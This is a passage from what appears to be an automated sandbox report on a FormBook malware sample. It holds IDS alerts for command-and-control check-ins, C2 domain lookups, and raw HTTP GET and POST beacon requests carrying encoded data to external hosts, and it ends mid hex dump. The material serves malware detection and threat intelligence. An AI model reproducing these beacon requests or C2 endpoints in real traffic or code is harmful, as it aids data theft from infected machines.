            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49736 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49755 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49752 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49731 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49739 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49732 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49730 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49730 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49715 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49720 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49758 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49758 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sun, 22 Sep 2024 15:58:51 GMTserver: Apacheset-cookie: __tad=1727020731.2885297; expires=Wed, 20-Sep-2034 15:58:51 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sun, 22 Sep 2024 15:58:53 GMTserver: Apacheset-cookie: __tad=1727020733.8201675; expires=Wed, 20-Sep-2034 15:58:53 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sun, 22 Sep 2024 15:58:56 GMTserver: Apacheset-cookie: __tad=1727020736.2641658; expires=Wed, 20-Sep-2034 15:58:56 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: GET /2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?u2pl=VvmP2xFp&0th4S=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV15vzCfsX7PVMYIeNh7VIWv397Pk5GDHjjKk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?0th4S=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYUy0f6KZWOuHAGxqpBfNEWVS56C/Y70R0u+E=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?0th4S=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVbXaFalsRh/PHN6RHd5lVuz72HidyE/KKxQw=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?0th4S=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exr1k3rbVGomG72bvSmTd+X16WAn8mpVexUKk=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?0th4S=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1qK6qUK96iio+RiU/b4DSTCXDmv8QzV8Y/qA=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?0th4S=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0Q9w2g6Txj+QK6DQX/6Khz9Uha7obgVbYrKE=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?0th4S=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txP0JHW5az1rIxyFBBCDSCP7ShkB7z26H/KD0=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /pp43/?0th4S=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVr6vGFx1RKES4JkCccCfv+nr7lBPNi1x5RxE=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /lrst/?0th4S=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KZmyEBjaCNdZ4vGhsxtLzd0F9+S16IRTv5qY=&u2pl=VvmP2xFp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sailnway.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficDNS traffic detected: DNS query: www.woshop.online
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: global trafficDNS traffic detected: DNS query: www.elsupertodo.net
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.tekilla.wtf
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.languagemodel.pro
            Source: global trafficDNS traffic detected: DNS query: www.kexweb.top
            Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.nobartv6.website
            Source: global trafficDNS traffic detected: DNS query: www.sailnway.net
            Source: unknownHTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 30 74 68 34 53 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 34 7a 6a 58 64 76 2f 76 48 4d 4c 6a 43 41 63 70 72 30 34 4f 35 6d 75 32 54 4f 35 41 4e 48 76 56 73 67 3d 3d Data Ascii: 0th4S=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe4zjXdv/vHMLjCAcpr04O5mu2TO5ANHvVsg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:57:01 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:57:03 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:57:06 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 22 Sep 2024 15:57:08 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 22 Sep 2024 15:57:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 